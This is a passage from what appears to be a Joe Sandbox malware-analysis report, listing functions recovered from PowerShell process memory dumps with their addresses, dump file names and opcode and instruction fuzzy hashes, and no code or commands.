                                                                                          • Opcode Fuzzy Hash: 7bb1fd125f8ed5d6ff5a42ffb6eaafd8c5bade20f18a15172715399cd085bb36
                                                                                          • Instruction Fuzzy Hash: CC317C70E002099FDB04DFB9D4947AEBAF6EF89310F119029E406EB350EB35AC418B61
                                                                                          Function 04C6E640 Relevance: .1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e50902a785c91dd0b1ea027757ceb220ce2d7b85b52ed4d95e8b619d4231951a
                                                                                          • Instruction ID: bbf45c571faa51ed8576ec089caffabd08cf4e6148c25985e12df61d0a5224ca
                                                                                          • Opcode Fuzzy Hash: e50902a785c91dd0b1ea027757ceb220ce2d7b85b52ed4d95e8b619d4231951a
                                                                                          • Instruction Fuzzy Hash: FB315C74A006059FCB18DF79D5D4A9EBBF2FF48304F108529E416AB394DB34AD45CB91
                                                                                          Function 04C6DFC0 Relevance: .1, Instructions: 82COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c201fa9002f363349b5a2f3140bdcd884e99d69b83bc386bc0b5c626417a9cd0
                                                                                          • Instruction ID: bd61f76404fd7010f683fdbe125c67840e15710a29eb9963d3b4e1553691f4d9
                                                                                          • Opcode Fuzzy Hash: c201fa9002f363349b5a2f3140bdcd884e99d69b83bc386bc0b5c626417a9cd0
                                                                                          • Instruction Fuzzy Hash: 43314C38A002148FCB18DF69D098AAEBBF2AF89314F15856DD406EB351CB75AC45DB50
                                                                                          Function 04C6AD38 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d26c5aadbd7f62b084d84db64837a7ee0e0b98766c88c9e65759c66665ee71d6
                                                                                          • Instruction ID: cb7814bca7679f682d52b08763c78435a5f984b1d971c6cab4028c3d26bd44c7
                                                                                          • Opcode Fuzzy Hash: d26c5aadbd7f62b084d84db64837a7ee0e0b98766c88c9e65759c66665ee71d6
                                                                                          • Instruction Fuzzy Hash: CD3132B8E002099FDB04EFA4D894AAE7BB6EF84310F118469D515AF394DF399D418F50
                                                                                          Function 04C6DFD0 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bb3211976bb9de473ff7bbdd5a22ec5b5fe01463f3075541e4a03c8ef26ec861
                                                                                          • Instruction ID: c2d9a127773294ba18b6f67eba27bfbe00ebc9f971193b5c279d8b8cb24cca15
                                                                                          • Opcode Fuzzy Hash: bb3211976bb9de473ff7bbdd5a22ec5b5fe01463f3075541e4a03c8ef26ec861
                                                                                          • Instruction Fuzzy Hash: 32314C34A002148FCB18DF69D498AAEBBF6FF88314F058569E406EB350DF75AC45CB90
                                                                                          Function 0332F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 98899bfaa542d95f16e6c5e94fb58000937bab36aef4f0e5b3f9107e355f3847
                                                                                          • Instruction ID: e134529620428f1d579c7b5bdc866a967bb846cdef1bbd26a338c25f867a700c
                                                                                          • Opcode Fuzzy Hash: 98899bfaa542d95f16e6c5e94fb58000937bab36aef4f0e5b3f9107e355f3847
                                                                                          • Instruction Fuzzy Hash: 5F210272508200EFCB05CF14D9C0B26BF79FB88314F24C5ADE9090A256C376C496CBA1
                                                                                          Function 04C693F0 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a377c80d24dba6bf7d97136ec49ebeed52616a27b1cedd2791a9e6cdbb5501e
                                                                                          • Instruction ID: ffffab592ed988aeb4035c275230ed0ff00fea321c0b58edf821367bd520f096
                                                                                          • Opcode Fuzzy Hash: 9a377c80d24dba6bf7d97136ec49ebeed52616a27b1cedd2791a9e6cdbb5501e
                                                                                          • Instruction Fuzzy Hash: B0319CB09057448EDB60CF6AD18879AFFF2EF88324F28C46DC84E9B245C674A541CF61
                                                                                          Function 0332F02C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7b6acad8ba54151ec9aa7fa266e534ba95af43e0a46bbb2972357622f3d312c
                                                                                          • Instruction ID: 415151207bf101a40cb60e3162240b9dcfe2e8bc68d93cab141ce2a92bd58edc
                                                                                          • Opcode Fuzzy Hash: b7b6acad8ba54151ec9aa7fa266e534ba95af43e0a46bbb2972357622f3d312c
                                                                                          • Instruction Fuzzy Hash: 022126B5504240DFDB14DF24D9C0B26BFB9FB84324F24CAADD90A4B656C73AD446CB61
                                                                                          Function 04C69400 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 466c3105c5d9f26b700dfd72607471283fc0dd17e5dddd5e41d971289d170e9b
                                                                                          • Instruction ID: 3943a59a0a19688fb5fbe8e3760a57c8e775fafac85b1461325e818377284abc
                                                                                          • Opcode Fuzzy Hash: 466c3105c5d9f26b700dfd72607471283fc0dd17e5dddd5e41d971289d170e9b
                                                                                          • Instruction Fuzzy Hash: 32216BB59057448EDB60CF6AC08879AFFF7EF88320F28C42ED84E9B245D67464818F61
                                                                                          Function 04C67664 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8ad67681c01f6a54539fb93e7b0076774cd90b056ff387b4a01536475c036f2
                                                                                          • Instruction ID: c59065e5864a1c614665b577c871fdd3c055449940603fece05b24cc64ab515c
                                                                                          • Opcode Fuzzy Hash: b8ad67681c01f6a54539fb93e7b0076774cd90b056ff387b4a01536475c036f2
                                                                                          • Instruction Fuzzy Hash: 3611FE79B001188FCF04EBACD8809DD77F6EBC8325B0440A9E509DB315DB35ED118BA0
                                                                                          Function 0332F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                                                                          • Instruction ID: bc3b0e0c2ac7e755069ff0990078288ecb2f77ffb26c24dd7ec21986abc626fc
                                                                                          • Opcode Fuzzy Hash: bf7c6e54c1a5606df9920c627ceee2d02bff4a31f99f9d7d2463bdde2845d744
                                                                                          • Instruction Fuzzy Hash: FB219D76508240DFDF06CF10D9C4B16BF72FB88314F28C5A9D9494A656C33AD4AACB91
                                                                                          Function 0332F027 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4ad5f699aa1d3ceab6775d5404ed8eeb33f0730dc0ae35eb902cae87933dcc5
                                                                                          • Instruction ID: 60cb98cca4477da3e8ed33ba61a6a5c5e799161d8b78506588cc165e17b38edf
                                                                                          • Opcode Fuzzy Hash: b4ad5f699aa1d3ceab6775d5404ed8eeb33f0730dc0ae35eb902cae87933dcc5
                                                                                          • Instruction Fuzzy Hash: D1118B75504280DFDB15CF14D9C4B15BFB1FB84328F28C6AAD8494B656C33AD44ACBA1
                                                                                          Function 04C6BCE0 Relevance: .1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: adcdc82e9e7886c483470eb86db16ad45c8afe81ee34664b52d57085c83dfba4
                                                                                          • Instruction ID: aa42dc586d5815a475673f3b8aab96e6e9a8100f92d8ec17c94ac7538809c943
                                                                                          • Opcode Fuzzy Hash: adcdc82e9e7886c483470eb86db16ad45c8afe81ee34664b52d57085c83dfba4
                                                                                          • Instruction Fuzzy Hash: 0B01D2312097949FC719CB79D694A9A7FE1AF46210F1888EED18ACB7A2DA21FC44C701
                                                                                          Function 04C6E100 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e7297be1182a31e1040a348c3a5dc26cc3a4496d2034e3ac8dde451de4d1c5c
                                                                                          • Instruction ID: 3b7a345ebdf00a5fd687cb187e24b503cd8278a9b9422e8f2408e7b1eba130eb
                                                                                          • Opcode Fuzzy Hash: 1e7297be1182a31e1040a348c3a5dc26cc3a4496d2034e3ac8dde451de4d1c5c
                                                                                          • Instruction Fuzzy Hash: E0110935204750CFC728DF35D49485AB7F6EF8931536489ADD48A877A0DB36EC45CB50
                                                                                          Function 04C6DE98 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19c9a71d159ff436da11c282e4933f58f22994b66de59d5baad4f780ce722488
                                                                                          • Instruction ID: 61028d7f9f535d6e7b0591f993ee63171f476ffe2731b3f896d934351f153512
                                                                                          • Opcode Fuzzy Hash: 19c9a71d159ff436da11c282e4933f58f22994b66de59d5baad4f780ce722488
                                                                                          • Instruction Fuzzy Hash: A5015E35B00214DFCB119F78E848AAEBBF6FB89315F14406DE51AD7342DB32A911CB91
                                                                                          Function 0332D006 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9e2a8978b50bd60d6ec41e10dbd198e3865ffd549e443cb80ad52329242ea1ab
                                                                                          • Instruction ID: 49dbdf82f29cd2280833f573bf9d26e8f3f33f4157782ac2ae9c6e1b1f672248
                                                                                          • Opcode Fuzzy Hash: 9e2a8978b50bd60d6ec41e10dbd198e3865ffd549e443cb80ad52329242ea1ab
                                                                                          • Instruction Fuzzy Hash: 5E01697240D3D05EE7128B259C94752BFA8DF53224F0984DBE8888F2A3C2685C45C772
                                                                                          Function 04C6BF10 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 923eac0727d6fd9edcd407886a867bd0cb0490afd685b8d880287b7539198a35
                                                                                          • Instruction ID: 09a626b7f2a48e1d67ad465dd0c67a4adb4c32602554905e452ff3eae4e408a0
                                                                                          • Opcode Fuzzy Hash: 923eac0727d6fd9edcd407886a867bd0cb0490afd685b8d880287b7539198a35
                                                                                          • Instruction Fuzzy Hash: CB01D13130A3A15FD7018A7A98909AB7FE9EF8662071940AFF884CB362C6B0CD048760
                                                                                          Function 0332D01D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3fe9ddf6996af456f4c74ec3c3d1217b3e676c5bfd7537d823cba9e822bb773d
                                                                                          • Instruction ID: 5b21b8b13816b9fddb0891088fbc0374bdb24bcaec18a433ebd60a854aa70e3d
                                                                                          • Opcode Fuzzy Hash: 3fe9ddf6996af456f4c74ec3c3d1217b3e676c5bfd7537d823cba9e822bb773d
                                                                                          • Instruction Fuzzy Hash: 4C01F2714093509AE720CE29DCC0B66FFACEF41324F0CC45AED684B6A2C67C9841C6B1
                                                                                          Function 04C67940 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 973301147a36f8db630d43f08dcc64b795a9f22d4c8d20d454222053420103cb
                                                                                          • Instruction ID: cf0ba810988c56950ef832bb8e4ba497150bb507bbb05cbfc2f6fdd4fd3bf917
                                                                                          • Opcode Fuzzy Hash: 973301147a36f8db630d43f08dcc64b795a9f22d4c8d20d454222053420103cb
                                                                                          • Instruction Fuzzy Hash: C2F04C3020A3505FC701C7A8D88096FBFF5DF86224704095DE04AC7652CF749C06C761
                                                                                          Function 0332D8D3 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 11574dcce193cd27840527d18f8426241c8d8f479578bd87a119444c983e435c
                                                                                          • Instruction ID: d2d785429ab6bee453b1ecdb16353e5f86ff7d6bba363030bc3c5af529d1e615
                                                                                          • Opcode Fuzzy Hash: 11574dcce193cd27840527d18f8426241c8d8f479578bd87a119444c983e435c
                                                                                          • Instruction Fuzzy Hash: 3FF0EC76600610AF9710CF0AD984C23FBADEBD4670319C55AE84A4B621C671EC42CAA0
                                                                                          Function 04C690D8 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 11b3a01c5383ff7e6bc386c0d72636cae437b92a5b21884fdc1fa440baf1dfb0
                                                                                          • Instruction ID: c00f110bf11a14ae393b829c281ad8f5d10aeef18735573f6dd3677e99fa4856
                                                                                          • Opcode Fuzzy Hash: 11b3a01c5383ff7e6bc386c0d72636cae437b92a5b21884fdc1fa440baf1dfb0
                                                                                          • Instruction Fuzzy Hash: F3F0C875A042444BD301AB29D05439B7FA5DFC1318F5080AED4568B396CE396845CBB1
                                                                                          Function 04C6DE38 Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76172f44eec985c6d84d14367e00b15099e729a2b8c4258f41cfb46b6d728b07
                                                                                          • Instruction ID: ac908466086bf64169323dace24f5190d7a82574cf15dc482e1c61d59781fa82
                                                                                          • Opcode Fuzzy Hash: 76172f44eec985c6d84d14367e00b15099e729a2b8c4258f41cfb46b6d728b07
                                                                                          • Instruction Fuzzy Hash: 83F05E347051808FC3118F2DD4948A6BBF6AFCA71532900AAE596CB332CA61DC01CB90
                                                                                          Function 0332D8C4 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1847621665.000000000332D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0332D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_332d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 58ea5c86ed574afcbbcb074318257781f84bb310962e27284292556bb3edb51b
                                                                                          • Instruction ID: 83e063a1f41d180b51766a77d1db1cffdea2961fff03a9a7c15a09e52c4b4888
                                                                                          • Opcode Fuzzy Hash: 58ea5c86ed574afcbbcb074318257781f84bb310962e27284292556bb3edb51b
                                                                                          • Instruction Fuzzy Hash: 13F0F975104640AFD725CF06CD84D23BBB9FB89660B198499B89A4B722C631FC42CF60
                                                                                          Function 04C69158 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8c1e2be0ba9504982370b4372dea2d5e80b1194243fcc4a7b2c5aea2523b2487
                                                                                          • Instruction ID: be0d457fff112590502ed3114afdcab3f86e648374b7c95fada1ed0df5a91cce
                                                                                          • Opcode Fuzzy Hash: 8c1e2be0ba9504982370b4372dea2d5e80b1194243fcc4a7b2c5aea2523b2487
                                                                                          • Instruction Fuzzy Hash: CBF0B4705093444FD721DB78D4AC3867FE5EB02310F1044AEE54ECB392CB346980CB60
                                                                                          Function 04C67950 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e383ed0dee0f40191326263fbd92c0e12202f16d892a7e63b10cb20e434cb16a
                                                                                          • Instruction ID: 361bd9e788d3682107491940c2287e99542e0e72e195582c5301639b53c85b0c
                                                                                          • Opcode Fuzzy Hash: e383ed0dee0f40191326263fbd92c0e12202f16d892a7e63b10cb20e434cb16a
                                                                                          • Instruction Fuzzy Hash: B1F0A771700614AFD7149A99E884A6FB7EAEB88275B00492DF10AD3741DF34AD4287A4
                                                                                          Function 04C6E7A8 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6d4e029334ea89fd3cf19de05f51477fcd1a687b156b735e496962df3b6bcfc9
                                                                                          • Instruction ID: eec0f09d1e21abdf0686560a5bae50c531dbb7ac3912d6ab3abee3ab90ef29fb
                                                                                          • Opcode Fuzzy Hash: 6d4e029334ea89fd3cf19de05f51477fcd1a687b156b735e496962df3b6bcfc9
                                                                                          • Instruction Fuzzy Hash: 48E0F130F043C45BCF14866CA6E18CD7F549BC7524F1801BEC50267302C7F00509C321
                                                                                          Function 04C6767F Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 736959c972c45ddb068f923224f9e0a23ff8ef4610894a53aaa3ea2712fe8d1f
                                                                                          • Instruction ID: 4e65e5f374b991fe55529d129910dc7ca1df65b185934503be87003dbfac0a8c
                                                                                          • Opcode Fuzzy Hash: 736959c972c45ddb068f923224f9e0a23ff8ef4610894a53aaa3ea2712fe8d1f
                                                                                          • Instruction Fuzzy Hash: D5F0E539700219CFCB00FBADD8805997BE3EBC83557058558E50ACB310DF34EC024B90
                                                                                          Function 04C690E8 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 223edd8cba455a58963ff9520ae078da00e46284b62c6819bdb01fcc0c90cd1b
                                                                                          • Instruction ID: 231ef9f76a8dc9b071770e6d58bd90cd9b1137ee501df890b4591a52fd8c6e1a
                                                                                          • Opcode Fuzzy Hash: 223edd8cba455a58963ff9520ae078da00e46284b62c6819bdb01fcc0c90cd1b
                                                                                          • Instruction Fuzzy Hash: EDF0AE79A041148BE304AB69D05479B7796DFC4714F50816ED5154B3C9CE397845CFF1
                                                                                          Function 04C6DE48 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80908d2d21ae01ce84e0762c7cd6043a4f048b8209b197ef2f9622448806d5b1
                                                                                          • Instruction ID: 7bf2b65f66915483a36f35d69863d4bc74c6a6559829058952268968597d0d01
                                                                                          • Opcode Fuzzy Hash: 80908d2d21ae01ce84e0762c7cd6043a4f048b8209b197ef2f9622448806d5b1
                                                                                          • Instruction Fuzzy Hash: F4E01A357001108F83109F1ED498C66B7FAEFCE76571940AAE54ACF331DA61EC01CB90
                                                                                          Function 04C69542 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87241f596d368f0e133a9c3f791d3c68a765ed16ca5ab7c832f4f5b086e89803
                                                                                          • Instruction ID: 0ca6c05cf49ce13e0686ef0131ee121c023f25d2beec1a232acd03082969df8b
                                                                                          • Opcode Fuzzy Hash: 87241f596d368f0e133a9c3f791d3c68a765ed16ca5ab7c832f4f5b086e89803
                                                                                          • Instruction Fuzzy Hash: 87E0D82130B2D20B8726A1BD15905BA6FD74EC385C31941BEC546CB253DC508C0193B2
                                                                                          Function 04C6DCD9 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e9a0bb357b5c07fcce1beda99e5328066fcf564bb84fdb27f6b4ac4451f2454
                                                                                          • Instruction ID: 37f199e3af97225e8874735e04c9238c069aa341dce3ab7b57befacaf04bde9d
                                                                                          • Opcode Fuzzy Hash: 3e9a0bb357b5c07fcce1beda99e5328066fcf564bb84fdb27f6b4ac4451f2454
                                                                                          • Instruction Fuzzy Hash: FCE02B31700440978B0C865DE4954F9BF76AFCA720F04C07ED40BA7300CA716915D6F1
                                                                                          Function 04C6896A Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
